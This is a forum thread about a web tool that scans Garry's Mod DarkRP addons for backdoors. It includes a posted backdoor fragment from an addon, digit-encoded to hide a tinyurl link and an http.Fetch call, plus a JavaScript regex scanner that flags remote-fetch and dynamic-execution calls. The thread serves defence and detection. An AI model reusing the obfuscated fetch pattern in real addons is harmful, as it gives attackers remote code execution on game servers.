This would require an addon in-game & is going into a realm we're not wanting to take this into right now. However, afaik there are addons which do similar things to this. The major issue would be that most DarkRP servers run addons with a load of hooks & console commands. Knowing which ones to whitelist, and going through that process, would be so time consuming that, in reality, I think most people would just start clicking through "yes" out of impatience. This could also fuck with certain DRMs which check to see that core game functions haven't been overwritten in an attempt to detour, which is now starting to get into a kinda messy area we don't want to go into.
It's probably useful to explain the conception of this system from a perspective that I guess I should have given from the start. For most people, when they get a backdoor, they default to searching for certain suspect things and then filtering through the results to find the backdoor. Building the kind of system Moat is talking about isn't really practical for most server owners.
Obviously people who use game hosting don't have direct access to SSH to run things like regex and grep searches. So when they get a backdoor, they're not able to easily search for possibly malicious code, so they run into a wall straight away. They will need a local version of the server, and then something to search through the files easily, which Windows search isn't good at, because it won't search the .gma files, and sometimes not even the .lua files. Plus it's very slow.
To build on this issue: most server owners don't know how to search for things like obfuscated code, and they might not think to search for the things our system does.
This is what this system is designed to help with. It's not designed to be over-engineered; right now it's a quick solution for people who need to find backdoors right now. This was a response to an issue our customers had. We could have spent weeks, maybe months, making this much more complex, only to still have some false positives and, worse, possibly some false negatives, but the reality is that it's not worth it right now. This tool works and is more than good enough for what it is designed to do. We would rather work on other features which more customers want and will use, as well as upgrading our whole codebase to a new version of the project our panel is built from, to improve general stability and more.
You've said this a few times. If you're so set on being helpful, why aren't you telling us what isn't detected by this system that a backdoor would use, that's actually used by skids? I'm sure you could make some malicious code that it won't detect, but the reality is all backdoors come down to some form of RCE. Afaik this will detect any code that allows remote execution, but we're human and probably missed some shit, so actually help out instead of just saying you want to help out. Just like when you said you'd move Moat Gaming out of the TTT section, this is just a throw-away statement that you're not backing up so far.
This just about sums up what you think. It doesn't matter if this tool is useful; you just want to have an issue with it. You have an unhealthy hate for anything Crident, which you dress up as memes or jokes, but it's so transparent and obvious. If you ever get called on it, it was all just bait, of course! Your entire goal here is to try and make it look bad, when we're just trying to do something useful. I'd love to see you actually contribute something instead of just looking for issues.
I thought this thread was very useful and helpful till Moat came along and derailed it with nonsense.
It still can be, idk why people have to bring their grudge to something that can benefit everyone.
Honestly it's probably just best to ignore him since he seems really focused on getting the thread ripped apart cause his ego can't let go.
Oh goodness gracious, next_level_bigpayload is something I haven't seen in a long time. I remember helping write that years ago.
To make a truly effective backdoor scanning system you would need some sort of run-time analysis via method detouring (hooking that into a neural network, maybe), pattern scanning, file hash blacklists, and probably de-obfuscation or obfuscation detection. Even with all this you will maybe catch 70% of backdoors, and if the backdoor dev has access to your system it wouldn't be hard to bypass it via obfuscation techniques. It's relatively easy to bypass modern anti-viruses backed by multi-million dollar companies. Making an anti-virus is not easy, nor will it ever be something done without a significant source of revenue or a team of talented people with hearts of gold.
Don't expect a system that will effectively catch backdoors any time soon.
Could you give an example backdoor that this wouldn't detect?
I'll give it a go quick. Can't promise I'll have something for you though.
Isn't there a bunch of ways to escape a docker container? I haven't kept up with the docker vulns..
This is not an addon and it should be moved.
Addons is now a general release section for now. Hopefully this will be more clear once I can get some sections reworked.
As far as I'm aware there are no ways to escape Docker containers, but if you're able to provide some resources on that it would be appreciated. I'll follow up on your other reply at some point today, most likely.
If you want some help, let me know. I've been planning some kind of anti-malicious system for a while now. The theory I have now is combining a mix of static detection and runtime detection. Static detection via string pattern analysis, hash blacklists, workshop ID blacklists (maybe; fairly certain add-ons do not change ID after code changes, which could result in false positives), and maybe AST pattern analysis if I can think of a way to drill into an expression tree to evaluate obfuscated code (this may help with detecting ciphered strings). The runtime detection would be pretty simple, just detouring Lua methods, but it would have to be paired with the static detection system to catch nasty stuff like indexing the results of debug.getfenv(...) to get the HTTP method, or some other nasty stuff. Aaaand it would also need to hook luaL_dostring to catch and quarantine nasties before runtime, throw errors in the call stack of runtime-detected stuff to halt execution, and last but not least log nasties (low-severity detections) to an external server for manual analysis in a way that wouldn't piss off devs making private scripts.
Also what I said earlier still stands. Even this system would be fairly easy to get around. BUT! it would catch most nasties and be fun as hell to make and maintain.
This type of obf method is now detected. Thanks for the creative idea <3
Your idea sounds pretty neat, and if you ever finish it we would happily add it to our mod manager to try & give you some exposure. However, this isn't what our system is trying to do. We don't want our system to operate within the server's runtime; this way the backdoor can't use any detour black magic to bypass the detection.
Fair enough. One thing I think I forgot to include in the previous comment is the idea of proxying one of the DLLs loaded by the Source engine at runtime to allow function detours before any script is loaded (including include/init.lua). The only things left for malware to do are to find an edge case in our detection system, timing attacks, garbage collection magic, and accessing memory from Lua (I think CAC does this). All this could potentially be detected at scan time though.
Just out of curiosity what language are you using for your scanner?
The backend of the scanner is built using JS.
🎊 thread is back from the dead 🎊
To clear some things up: Crident hasn't ever endorsed leaking. However, I did make a mistake by backlinking a cheat website from our website for about ~7 days a few months back. Obviously we aren't going to be doing something like that again, and I hope we can move forward now that's in the past.
My server got backdoored by HalogenServers, here is his backdoor if anyone is interested.
I found it in The Purge; unsure if the addon is legitimate or not because I am not the one who installed it.
sv_purge.lua has at least two backdoors that I could find. I don't much care for the obfuscated one at the top though ...
https://pastebin.com/raw/JE7Nu7AW
Rather the one in the middle of the script
local function sep (str)
  -- Splits a run of digits into three-character chunks: gsub puts a comma in
  -- front of every "%x%x%x" match, :sub drops the leading comma, and
  -- string.Explode splits on the commas, giving a table like {"104","116",...}.
  return string.Explode(",", str:gsub("%x%x%x", '%' .. "," .. '%1'):sub(1 + #","))
end
-- Three decimal digits per character. Decodes to an https:// short link (a tinyurl.com URL).
local ServerInit = sep("104116116112115058047047116105110121117114108046099111109047121057057104050099114055")
-- Decodes to the Lua text: return http.Fetch
local ServerBeginInit = sep("114101116117114110032104116116112046070101116099104")
-- Turns a table of decimal byte codes back into a string (string.char accepts the numeric strings).
function serverLoad(c)
  local serverResponse = ""
  for _, v in pairs(c) do
    serverResponse = serverResponse .. string.char(v)
  end
  return serverResponse
end
-- Note: ServerLoad (capital S) is a different global from serverLoad above; the trailing comment is inert.
ServerLoad = function() MsgN('no') end --CompileString
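The static side of the detection design discussed above (string pattern analysis plus decoding of ciphered strings) can be shown against the snippet just posted. The following is an added example written for this thread; it is not Crident's scanner and not the poster's code. It undoes the three-digits-per-byte encoding that sep() produces, runs a small set of regex rules over constructed Lua text (the two encoded literals from the posted sv_purge.lua snippet, the decoy comment line, and a benign _G line), re-scans whatever the literals decode to, and groups findings by detection type. The rule names, severities and sample lines are this example's own assumptions.

```javascript
// Undo the three-decimal-digits-per-byte encoding used by sep() in the posted
// snippet: "104116116112" -> "http". Returns null if the input is not a run of
// triplets or any triplet is above 255 (then it is not this encoding).
function decodeTriplets(s) {
  if (!/^(?:\d{3})+$/.test(s)) return null;
  const chars = [];
  for (let i = 0; i < s.length; i += 3) {
    const code = Number(s.slice(i, i + 3));
    if (code > 255) return null;
    chars.push(String.fromCharCode(code));
  }
  return chars.join('');
}

// Static signatures. Names and severities are this example's own choices
// (assumption), not any real tool's rule set; tune them to your addon base.
const RULES = [
  { type: 'remote-fetch',   severity: 'high',   re: /\bhttp\.(?:Fetch|Post)\b/ },
  { type: 'dynamic-exec',   severity: 'high',   re: /\b(?:RunString|RunStringEx|CompileString)\b/ },
  { type: 'env-escape',     severity: 'high',   re: /\bdebug\.(?:getfenv|setfenv|getregistry)\b/ },
  { type: 'global-index',   severity: 'medium', re: /\b_G\s*[\[.]/ },
  { type: 'triplet-string', severity: 'medium', re: /"(?:\d{3}){6,}"/ },
];

const TRIPLET_LITERAL = /"((?:\d{3}){6,})"/;

// Scan Lua source line by line. Trailing "--" comments are stripped first
// (naively: a "--" inside a string literal is cut too) so a comment such as
// "--CompileString" does not trip the dynamic-exec rule. Triplet-encoded
// literals are decoded and the decoded text is scanned as well, so a hidden
// "return http.Fetch" is reported as remote-fetch, not only as an encoded
// string. Findings are returned flat and grouped by type for triage.
function scanLua(src) {
  const findings = [];
  src.split('\n').forEach((raw, idx) => {
    const line = raw.replace(/--.*$/, '');
    const lineNo = idx + 1;
    for (const rule of RULES) {
      if (rule.re.test(line)) {
        findings.push({ line: lineNo, type: rule.type, severity: rule.severity, text: line.trim() });
      }
    }
    const m = TRIPLET_LITERAL.exec(line);
    if (m) {
      const decoded = decodeTriplets(m[1]);
      if (decoded !== null) {
        for (const rule of RULES) {
          if (rule.type !== 'triplet-string' && rule.re.test(decoded)) {
            findings.push({ line: lineNo, type: rule.type, severity: rule.severity, text: 'decoded: ' + decoded });
          }
        }
      }
    }
  });
  const byType = {};
  for (const f of findings) {
    (byType[f.type] = byType[f.type] || []).push(f);
  }
  return { findings, byType };
}

// One printable line per finding, grouped by type.
function report(result) {
  const lines = [];
  for (const type of Object.keys(result.byType)) {
    for (const f of result.byType[type]) {
      lines.push(`${f.severity.padEnd(6)} ${type.padEnd(14)} line ${f.line}: ${f.text}`);
    }
  }
  return lines;
}

// Constructed sample: the two encoded literals from the posted sv_purge.lua
// snippet, its decoy comment line, and a benign _G use of the kind that
// produces false positives.
const SAMPLE = [
  'local ServerInit = sep("104116116112115058047047116105110121117114108046099111109047121057057104050099114055")',
  'local ServerBeginInit = sep("114101116117114110032104116116112046070101116099104")',
  "ServerLoad = function() MsgN('no') end --CompileString",
  'local cfg = _G.MyAddon or {}',
].join('\n');

console.log(report(scanLua(SAMPLE)).join('\n'));
```

Run with `node` and the second encoded literal is reported as a high-severity remote-fetch on line 2 (decoded text "return http.Fetch"), both literals as triplet-strings, and the _G line as a medium global-index; the commented-out CompileString produces nothing. Grouping by type is what makes a noisy result set triageable: every _G hit lands in one bucket that can be skimmed or suppressed, while the decoded http.Fetch stays visible on its own.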
Nice find - is this from a workshop addon?
No clue, I am not the one who manages the addons installed on my DarkRP, but I'll have to keep a closer eye on them.
The Purge is a GMod Store addon, so I am guessing that this is either bought or leaked.
Where is the download link?
There is no download; it's an online tool c:
Hi, I still do not understand: has ScanBackDoor come out or not?
Honestly I've seen the scanner in action; the guy I dev for had to use it, but it was far more effective to try and use Lua to find the backdoor because the scanner gave so many fucking detections. I know you want it to be thorough, but there are plenty of addons that use _G, one of the top things that showed up, and it's listed as high severity. The scanner was useless because it detected so much shit it would've been a waste of time to sort through it. It really needs a sort-by-detection-type feature.
Nice job and well tested!
What addons were you finding _G usage in?